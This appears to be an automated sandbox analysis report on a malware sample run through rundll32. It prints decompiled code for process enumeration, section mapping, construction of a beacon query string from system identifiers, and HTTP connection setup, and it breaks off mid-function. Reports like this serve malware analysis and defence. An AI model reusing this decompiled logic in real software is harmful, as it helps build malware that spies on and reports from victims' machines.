                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: ErrorEventFileInternetLastReadReset$MultipleObjectsWait
                                      • String ID:
                                      • API String ID: 3290165071-0
                                      • Opcode ID: 244eb35fd861550490835f7b8cbc6d5760a272ff45b73a4b0cb79835e6199a87
                                      • Instruction ID: 06f6ce6c1971098e678c127528741fe0b12505ab56e0fdee92ff2e6c65196674
                                      • Opcode Fuzzy Hash: 244eb35fd861550490835f7b8cbc6d5760a272ff45b73a4b0cb79835e6199a87
                                      • Instruction Fuzzy Hash: 81318E36A00604BBDB22BFA6DC44A7FB7BAFF84760F144668E551D7290EA30F9419B10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 68%
                                      			E04DE6DB6() {
                                      				char _v264;
                                      				void* _v300;
                                      				void* _t5;
                                      				int _t8;
                                      				intOrPtr _t9;
                                      				int _t15;
                                      				void* _t17;
                                      
                                      				_t15 = 0;
                                      				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
                                      				_t17 = _t5;
                                      				if(_t17 != 0) {
                                      					_t8 = Process32First(_t17,  &_v300);
                                      					while(_t8 != 0) {
                                      						_t9 =  *0x4dea348; // 0x6bd5a8
                                      						_t2 = _t9 + 0x4debea8; // 0x73617661
                                      						_push( &_v264);
                                      						if( *0x4dea12c() != 0) {
                                      							_t15 = 1;
                                      						} else {
                                      							_t8 = Process32Next(_t17,  &_v300);
                                      							continue;
                                      						}
                                      						L7:
                                      						FindCloseChangeNotification(_t17); // executed
                                      						goto L8;
                                      					}
                                      					goto L7;
                                      				}
                                      				L8:
                                      				return _t15;
                                      			}

                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04DE6DC6
                                      • Process32First.KERNEL32(00000000,?), ref: 04DE6DD9
                                      • Process32Next.KERNEL32(00000000,?), ref: 04DE6E05
                                      • FindCloseChangeNotification.KERNEL32(00000000), ref: 04DE6E14
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 3243318325-0
                                      • Opcode ID: 82eab527369eed38490d326d6c6ad11b1021d9b00589e8cbe70dbaf725e989ce
                                      • Instruction ID: a6de5298c908fc4c419178ef848db1350a9ffc241341a23d97ea45d0be993dc7
                                      • Opcode Fuzzy Hash: 82eab527369eed38490d326d6c6ad11b1021d9b00589e8cbe70dbaf725e989ce
                                      • Instruction Fuzzy Hash: 29F090726011286BDB20BA67DC08EFF76ACEBD5B54F804062EA45D7140EB34E95586B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 72%
                                      			E04DE25D7(intOrPtr* __eax, void** _a4) {
                                      				int _v12;
                                      				void* _v16;
                                      				void* _v20;
                                      				void* _v24;
                                      				int _v28;
                                      				int _v32;
                                      				intOrPtr _v36;
                                      				int _v40;
                                      				int _v44;
                                      				void* _v48;
                                      				void* __esi;
                                      				long _t34;
                                      				void* _t39;
                                      				void* _t47;
                                      				intOrPtr* _t48;
                                      
                                      				_t48 = __eax;
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				_v24 =  *((intOrPtr*)(__eax + 4));
                                      				_v16 = 0;
                                      				_v12 = 0;
                                      				_v48 = 0x18;
                                      				_v44 = 0;
                                      				_v36 = 0x40;
                                      				_v40 = 0;
                                      				_v32 = 0;
                                      				_v28 = 0;
                                      				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                      				if(_t34 < 0) {
                                      					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                      				} else {
                                      					 *_t48 = _v16;
                                      					_t39 = E04DE3A9C(_t48,  &_v12); // executed
                                      					_t47 = _t39;
                                      					if(_t47 != 0) {
                                      						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                      					} else {
                                      						memset(_v12, 0, _v24);
                                      						 *_a4 = _v12;
                                      					}
                                      				}
                                      				return _t47;
                                      			}

                                      APIs
                                      • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,77004EE0,00000000,00000000,04DE759F), ref: 04DE2634
                                        • Part of subcall function 04DE3A9C: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,04DE2649,00000002,00000000,?,?,00000000,?,?,04DE2649,00000000), ref: 04DE3AC9
                                      • memset.NTDLL ref: 04DE2656
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Section$CreateViewmemset
                                      • String ID:
                                      • API String ID: 2533685722-0
                                      • Opcode ID: d9d64a364fb024a8bbd88631a5c423510446b5b41a7fba1de82a375655f3b97f
                                      • Instruction ID: f98a4d5acc0bc6031f20d73ebb8917c2d9d5d4f8ba95c5c151b00816d4fe4ddb
                                      • Opcode Fuzzy Hash: d9d64a364fb024a8bbd88631a5c423510446b5b41a7fba1de82a375655f3b97f
                                      • Instruction Fuzzy Hash: E3211DB5E0020DAFDB11DFA9C8849EEFBB9FF48354F108569E505F3210D731AA488BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 68%
                                      			E04DE3A9C(void** __esi, PVOID* _a4) {
                                      				long _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				long _t13;
                                      
                                      				_v16 = 0;
                                      				asm("stosd");
                                      				_v8 = 0;
                                      				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                      				if(_t13 < 0) {
                                      					_push(_t13);
                                      					return __esi[6]();
                                      				}
                                      				return 0;
                                      			}

                                      APIs
                                      • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,04DE2649,00000002,00000000,?,?,00000000,?,?,04DE2649,00000000), ref: 04DE3AC9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: SectionView
                                      • String ID:
                                      • API String ID: 1323581903-0
                                      • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                      • Instruction ID: 2445e725f387f3a919bb3b582041c1ed1af8682de248c9794e21325408760724
                                      • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                      • Instruction Fuzzy Hash: 0AF012B5A0420CBFDB119FA5CC85CAFBBBDEB44355B104939B552E2090D630EE489B60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 68%
                                      			E04DE636D(long __eax, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a20, intOrPtr _a24) {
                                      				intOrPtr _v0;
                                      				intOrPtr _v4;
                                      				void* _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v52;
                                      				void* __ecx;
                                      				void* __edi;
                                      				long _t29;
                                      				intOrPtr _t30;
                                      				intOrPtr _t31;
                                      				intOrPtr _t32;
                                      				intOrPtr _t33;
                                      				intOrPtr _t34;
                                      				void* _t37;
                                      				intOrPtr _t38;
                                      				int _t41;
                                      				void* _t42;
                                      				intOrPtr _t46;
                                      				intOrPtr _t47;
                                      				intOrPtr _t54;
                                      				intOrPtr _t58;
                                      				intOrPtr* _t60;
                                      				void* _t61;
                                      				intOrPtr _t66;
                                      				intOrPtr _t72;
                                      				intOrPtr _t75;
                                      				intOrPtr _t78;
                                      				int _t81;
                                      				intOrPtr _t82;
                                      				int _t85;
                                      				intOrPtr _t87;
                                      				int _t90;
                                      				intOrPtr _t92;
                                      				int _t95;
                                      				intOrPtr* _t97;
                                      				intOrPtr* _t98;
                                      				void* _t99;
                                      				void* _t103;
                                      				void* _t104;
                                      				void* _t105;
                                      				intOrPtr _t106;
                                      				void* _t108;
                                      				int _t109;
                                      				void* _t110;
                                      				void* _t111;
                                      				void* _t113;
                                      				void* _t114;
                                      				void* _t116;
                                      
                                      				_t103 = __edx;
                                      				_t29 = __eax;
                                      				_t113 = _a20;
                                      				_v4 = 8;
                                      				if(__eax == 0) {
                                      					_t29 = GetTickCount();
                                      				}
                                      				_t30 =  *0x4dea018; // 0x258be91c
                                      				asm("bswap eax");
                                      				_t31 =  *0x4dea014; // 0x3a87c8cd
                                      				asm("bswap eax");
                                      				_t32 =  *0x4dea010; // 0xd8d2f808
                                      				asm("bswap eax");
                                      				_t33 =  *0x4dea00c; // 0x62819102
                                      				asm("bswap eax");
                                      				_t34 =  *0x4dea348; // 0x6bd5a8
                                      				_t3 = _t34 + 0x4deb633; // 0x74666f73
                                      				_t109 = wsprintfA(_t113, _t3, 2, 0x3d173, _t33, _t32, _t31, _t30,  *0x4dea02c,  *0x4dea004, _t29);
                                      				_t37 = E04DE3F1E();
                                      				_t38 =  *0x4dea348; // 0x6bd5a8
                                      				_t4 = _t38 + 0x4deb673; // 0x74707526
                                      				_t41 = wsprintfA(_t109 + _t113, _t4, _t37);
                                      				_t116 = _t114 + 0x38;
                                      				_t110 = _t109 + _t41;
                                      				if(_a24 != 0) {
                                      					_t92 =  *0x4dea348; // 0x6bd5a8
                                      					_t8 = _t92 + 0x4deb67e; // 0x732526
                                      					_t95 = wsprintfA(_t110 + _t113, _t8, _a24);
                                      					_t116 = _t116 + 0xc;
                                      					_t110 = _t110 + _t95; // executed
                                      				}
                                      				_t42 = E04DE1567(_t99); // executed
                                      				_t104 = _t42;
                                      				if(_t104 != 0) {
                                      					_t87 =  *0x4dea348; // 0x6bd5a8
                                      					_t10 = _t87 + 0x4deb8d4; // 0x736e6426
                                      					_t90 = wsprintfA(_t110 + _t113, _t10, _t104);
                                      					_t116 = _t116 + 0xc;
                                      					_t110 = _t110 + _t90;
                                      					HeapFree( *0x4dea2d8, 0, _t104);
                                      				}
                                      				_t105 = E04DE3268();
                                      				if(_t105 != 0) {
                                      					_t82 =  *0x4dea348; // 0x6bd5a8
                                      					_t12 = _t82 + 0x4deb8dc; // 0x6f687726
                                      					_t85 = wsprintfA(_t110 + _t113, _t12, _t105);
                                      					_t116 = _t116 + 0xc;
                                      					_t110 = _t110 + _t85;
                                      					HeapFree( *0x4dea2d8, 0, _t105);
                                      				}
                                      				_t106 =  *0x4dea3cc; // 0x54a95b0
                                      				_a24 = E04DE5D1C(0x4dea00a, _t106 + 4);
                                      				_t46 =  *0x4dea370; // 0x0
                                      				if(_t46 != 0) {
                                      					_t78 =  *0x4dea348; // 0x6bd5a8
                                      					_t15 = _t78 + 0x4deb8b6; // 0x3d736f26
                                      					_t81 = wsprintfA(_t110 + _t113, _t15, _t46);
                                      					_t116 = _t116 + 0xc;
                                      					_t110 = _t110 + _t81;
                                      				}
                                      				_t47 =  *0x4dea36c; // 0x0
                                      				if(_t47 != 0) {
                                      					_t75 =  *0x4dea348; // 0x6bd5a8
                                      					_t17 = _t75 + 0x4deb88d; // 0x3d706926
                                      					wsprintfA(_t110 + _t113, _t17, _t47);
                                      				}
                                      				if(_a24 != 0) {
                                      					_t108 = RtlAllocateHeap( *0x4dea2d8, 0, 0x800);
                                      					if(_t108 != 0) {
                                      						E04DE3950(GetTickCount());
                                      						_t54 =  *0x4dea3cc; // 0x54a95b0
                                      						__imp__(_t54 + 0x40);
                                      						asm("lock xadd [eax], ecx");
                                      						_t58 =  *0x4dea3cc; // 0x54a95b0
                                      						__imp__(_t58 + 0x40);
                                      						_t60 =  *0x4dea3cc; // 0x54a95b0
                                      						_t61 = E04DE3739(1, _t103, _t113,  *_t60); // executed
                                      						_t111 = _t61;
                                      						asm("lock xadd [eax], ecx");
                                      						if(_t111 != 0) {
                                      							StrTrimA(_t111, 0x4de928c);
                                      							_push(_t111);
                                      							_t66 = E04DE3970();
                                      							_a12 = _t66;
                                      							if(_t66 != 0) {
                                      								_t97 = __imp__;
                                      								 *_t97(_t111, _v0);
                                      								 *_t97(_t108, _v4);
                                      								_t98 = __imp__;
                                      								 *_t98(_t108, _v0);
                                      								 *_t98(_t108, _t111);
                                      								_t72 = E04DE5347(0xffffffffffffffff, _t108, _v24, _v20); // executed
                                      								_v52 = _t72;
                                      								if(_t72 != 0 && _t72 != 0x10d2) {
                                      									E04DE3F62();
                                      								}
                                      								HeapFree( *0x4dea2d8, 0, _v16);
                                      							}
                                      							HeapFree( *0x4dea2d8, 0, _t111);
                                      						}
                                      						RtlFreeHeap( *0x4dea2d8, 0, _t108); // executed
                                      					}
                                      					HeapFree( *0x4dea2d8, 0, _a16);
                                      				}
                                      				RtlFreeHeap( *0x4dea2d8, 0, _t113); // executed
                                      				return _a4;
                                      			}

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 04DE6383
                                      • wsprintfA.USER32 ref: 04DE63D0
                                      • wsprintfA.USER32 ref: 04DE63ED
                                      • wsprintfA.USER32 ref: 04DE640F
                                      • wsprintfA.USER32 ref: 04DE6432
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 04DE6442
                                      • wsprintfA.USER32 ref: 04DE6464
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 04DE6474
                                      • wsprintfA.USER32 ref: 04DE64AB
                                      • wsprintfA.USER32 ref: 04DE64CB
                                      • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04DE64E8
                                      • GetTickCount.KERNEL32 ref: 04DE64F8
                                      • RtlEnterCriticalSection.NTDLL(054A9570), ref: 04DE650C
                                      • RtlLeaveCriticalSection.NTDLL(054A9570), ref: 04DE652A
                                        • Part of subcall function 04DE3739: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,76D8C740,?,?,04DE653D,?,054A95B0), ref: 04DE3764
                                        • Part of subcall function 04DE3739: lstrlen.KERNEL32(?,?,?,04DE653D,?,054A95B0), ref: 04DE376C
                                        • Part of subcall function 04DE3739: strcpy.NTDLL ref: 04DE3783
                                        • Part of subcall function 04DE3739: lstrcat.KERNEL32(00000000,?), ref: 04DE378E
                                        • Part of subcall function 04DE3739: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04DE653D,?,054A95B0), ref: 04DE37AB
                                      • StrTrimA.SHLWAPI(00000000,04DE928C,?,054A95B0), ref: 04DE655C
                                        • Part of subcall function 04DE3970: lstrlen.KERNEL32(054A9B90,00000000,00000000,76D8C740,04DE6568,00000000), ref: 04DE3980
                                        • Part of subcall function 04DE3970: lstrlen.KERNEL32(?), ref: 04DE3988
                                        • Part of subcall function 04DE3970: lstrcpy.KERNEL32(00000000,054A9B90), ref: 04DE399C
                                        • Part of subcall function 04DE3970: lstrcat.KERNEL32(00000000,?), ref: 04DE39A7
                                      • lstrcpy.KERNEL32(00000000,?), ref: 04DE657B
                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 04DE6582
                                      • lstrcat.KERNEL32(00000000,?), ref: 04DE658F
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 04DE6593
                                        • Part of subcall function 04DE5347: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,770481D0), ref: 04DE53F9
                                      • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04DE65C3
                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04DE65D2
                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,054A95B0), ref: 04DE65E1
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 04DE65F3
                                      • RtlFreeHeap.NTDLL(00000000,?), ref: 04DE6602
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                      • String ID: FNwPq
                                      • API String ID: 1892477351-3591455833
                                      • Opcode ID: 94b9871e1e1cf5680c7d48e0c21e87c30a184ca99d713f274cfda2a55084f62d
                                      • Instruction ID: 94d667ad0731f773695f6948cb931d65715600d9e3de746f8cea5daa4695e905
                                      • Opcode Fuzzy Hash: 94b9871e1e1cf5680c7d48e0c21e87c30a184ca99d713f274cfda2a55084f62d
                                      • Instruction Fuzzy Hash: A8717DB1201202AFD711BBA6EC68F6A3BE8FB48714F050515F904DB361DB39ED059B65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 92%
                                      			E04DE7A71(void* __eax, void* __ecx, long __esi, char* _a4) {
                                      				void _v8;
                                      				long _v12;
                                      				void _v16;
                                      				void* _t34;
                                      				void* _t38;
                                      				void* _t40;
                                      				int _t53;
                                      				char* _t56;
                                      				long _t57;
                                      				void* _t58;
                                      				intOrPtr _t59;
                                      				long _t65;
                                      
                                      				_t65 = __esi;
                                      				_t58 = __ecx;
                                      				_v16 = 0xea60;
                                      				__imp__( *(__esi + 4));
                                      				_v12 = __eax + __eax;
                                      				_t56 = E04DE4DF6(__eax + __eax + 1);
                                      				if(_t56 != 0) {
                                      					_t53 = InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0); // executed
                                      					if(_t53 == 0) {
                                      						E04DE4C73(_t56);
                                      					} else {
                                      						E04DE4C73( *(__esi + 4));
                                      						 *(__esi + 4) = _t56;
                                      					}
                                      				}
                                      				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
                                      				 *(_t65 + 0x10) = _t34;
                                      				if(_t34 == 0 || InternetSetStatusCallback(_t34, E04DE7A06) == 0xffffffff) {
                                      					L15:
                                      					return GetLastError();
                                      				} else {
                                      					ResetEvent( *(_t65 + 0x1c));
                                      					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
                                      					 *(_t65 + 0x14) = _t38;
                                      					if(_t38 != 0 || GetLastError() == 0x3e5 && E04DE3A6F( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
                                      						_t59 =  *0x4dea348; // 0x6bd5a8
                                      						_t15 = _t59 + 0x4deb743; // 0x544547
                                      						_v8 = 0x84404000;
                                      						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
                                      						 *(_t65 + 0x18) = _t40;
                                      						if(_t40 == 0) {
                                      							goto L15;
                                      						}
                                      						_t57 = 4;
                                      						_v12 = _t57;
                                      						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
                                      							_v8 = _v8 | 0x00000100;
                                      							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
                                      						}
                                      						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
                                      							goto L15;
                                      						} else {
                                      							return 0;
                                      						}
                                      					} else {
                                      						goto L15;
                                      					}
                                      				}
                                      			}

                                      APIs
                                      • lstrlen.KERNEL32(?,00000008,77004D40), ref: 04DE7A83
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 04DE7AA6
                                      • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 04DE7ACE
                                      • InternetSetStatusCallback.WININET(00000000,04DE7A06), ref: 04DE7AE5
                                      • ResetEvent.KERNEL32(?), ref: 04DE7AF7
                                      • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 04DE7B0A
                                      • GetLastError.KERNEL32 ref: 04DE7B17
                                      • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 04DE7B5D
                                      • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 04DE7B7B
                                      • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 04DE7B9C
                                      • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 04DE7BA8
                                      • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 04DE7BB8
                                      • GetLastError.KERNEL32 ref: 04DE7BC2
                                        • Part of subcall function 04DE4C73: RtlFreeHeap.NTDLL(00000000,00000000,04DE55C4,00000000,?,?,00000000), ref: 04DE4C7F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                                      • String ID:
                                      • API String ID: 2290446683-0
                                      • Opcode ID: 1dda4a6faa7d32ff99377a36d3b458e21987ea9e55a0bfa8173663fafb7de7db
                                      • Instruction ID: 2f6bd947f6aabf7b088490d3ff8e5d7935e5d80c28361b124a8c41d9016a7bbc
                                      • Opcode Fuzzy Hash: 1dda4a6faa7d32ff99377a36d3b458e21987ea9e55a0bfa8173663fafb7de7db
                                      • Instruction Fuzzy Hash: 71419D71600605BBD731BFA6DC48EAB7BB9FB85700F108929F546D6290E735AA04DB20
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph
                                      (rendered graph of basic blocks 4de7eb5 through 4de80ef, legend: Executed / Not Executed; the block and edge listing is not reproduced here)
                                      C-Code - Quality: 51%
                                      			E04DE7EB5(long _a4, long _a8) {
                                      				signed int _v8;
                                      				intOrPtr _v16;
                                      				LONG* _v28;
                                      				long _v40;
                                      				long _v44;
                                      				long _v48;
                                      				CHAR* _v52;
                                      				long _v56;
                                      				CHAR* _v60;
                                      				long _v64;
                                      				signed int* _v68;
                                      				char _v72;
                                      				signed int _t76;
                                      				signed int _t80;
                                      				signed int _t81;
                                      				intOrPtr* _t82;
                                      				intOrPtr* _t83;
                                      				intOrPtr* _t85;
                                      				intOrPtr* _t90;
                                      				intOrPtr* _t95;
                                      				intOrPtr* _t98;
                                      				struct HINSTANCE__* _t99;
                                      				void* _t102;
                                      				intOrPtr* _t104;
                                      				void* _t115;
                                      				long _t116;
                                      				void _t125;
                                      				void* _t131;
                                      				signed short _t133;
                                      				struct HINSTANCE__* _t138;
                                      				signed int* _t139;
                                      
                                      				_t139 = _a4;
                                      				_v28 = _t139[2] + 0x4de0000;
                                      				_t115 = _t139[3] + 0x4de0000;
                                      				_t131 = _t139[4] + 0x4de0000;
                                      				_v8 = _t139[7];
                                      				_v60 = _t139[1] + 0x4de0000;
                                      				_v16 = _t139[5] + 0x4de0000;
                                      				_v64 = _a8;
                                      				_v72 = 0x24;
                                      				_v68 = _t139;
                                      				_v56 = 0;
                                      				asm("stosd");
                                      				_v48 = 0;
                                      				_v44 = 0;
                                      				_v40 = 0;
                                      				if(( *_t139 & 0x00000001) == 0) {
                                      					_a8 =  &_v72;
                                      					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                      					return 0;
                                      				}
                                      				_t138 =  *_v28;
                                      				_t76 = _a8 - _t115 >> 2 << 2;
                                      				_t133 =  *(_t131 + _t76);
                                      				_a4 = _t76;
                                      				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                      				_v56 = _t80;
                                      				_t81 = _t133 + 0x4de0002;
                                      				if(_t80 == 0) {
                                      					_t81 = _t133 & 0x0000ffff;
                                      				}
                                      				_v52 = _t81;
                                      				_t82 =  *0x4dea1c0; // 0x0
                                      				_t116 = 0;
                                      				if(_t82 == 0) {
                                      					L6:
                                      					if(_t138 != 0) {
                                      						L18:
                                      						_t83 =  *0x4dea1c0; // 0x0
                                      						_v48 = _t138;
                                      						if(_t83 != 0) {
                                      							_t116 =  *_t83(2,  &_v72);
                                      						}
                                      						if(_t116 != 0) {
                                      							L32:
                                      							 *_a8 = _t116;
                                      							L33:
                                      							_t85 =  *0x4dea1c0; // 0x0
                                      							if(_t85 != 0) {
                                      								_v40 = _v40 & 0x00000000;
                                      								_v48 = _t138;
                                      								_v44 = _t116;
                                      								 *_t85(5,  &_v72);
                                      							}
                                      							return _t116;
                                      						} else {
                                      							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                      								L27:
                                      								_t116 = GetProcAddress(_t138, _v52);
                                      								if(_t116 == 0) {
                                      									_v40 = GetLastError();
                                      									_t90 =  *0x4dea1bc; // 0x0
                                      									if(_t90 != 0) {
                                      										_t116 =  *_t90(4,  &_v72);
                                      									}
                                      									if(_t116 == 0) {
                                      										_a4 =  &_v72;
                                      										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                      										_t116 = _v44;
                                      									}
                                      								}
                                      								goto L32;
                                      							} else {
                                      								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                      								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                      									_t116 =  *(_a4 + _v16);
                                      									if(_t116 != 0) {
                                      										goto L32;
                                      									}
                                      								}
                                      								goto L27;
                                      							}
                                      						}
                                      					}
                                      					_t98 =  *0x4dea1c0; // 0x0
                                      					if(_t98 == 0) {
                                      						L9:
                                      						_t99 = LoadLibraryA(_v60); // executed
                                      						_t138 = _t99;
                                      						if(_t138 != 0) {
                                      							L13:
                                      							if(InterlockedExchange(_v28, _t138) == _t138) {
                                      								FreeLibrary(_t138);
                                      							} else {
                                      								if(_t139[6] != 0) {
                                      									_t102 = LocalAlloc(0x40, 8);
                                      									if(_t102 != 0) {
                                      										 *(_t102 + 4) = _t139;
                                      										_t125 =  *0x4dea1b8; // 0x0
                                      										 *_t102 = _t125;
                                      										 *0x4dea1b8 = _t102;
                                      									}
                                      								}
                                      							}
                                      							goto L18;
                                      						}
                                      						_v40 = GetLastError();
                                      						_t104 =  *0x4dea1bc; // 0x0
                                      						if(_t104 == 0) {
                                      							L12:
                                      							_a8 =  &_v72;
                                      							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                      							return _v44;
                                      						}
                                      						_t138 =  *_t104(3,  &_v72);
                                      						if(_t138 != 0) {
                                      							goto L13;
                                      						}
                                      						goto L12;
                                      					}
                                      					_t138 =  *_t98(1,  &_v72);
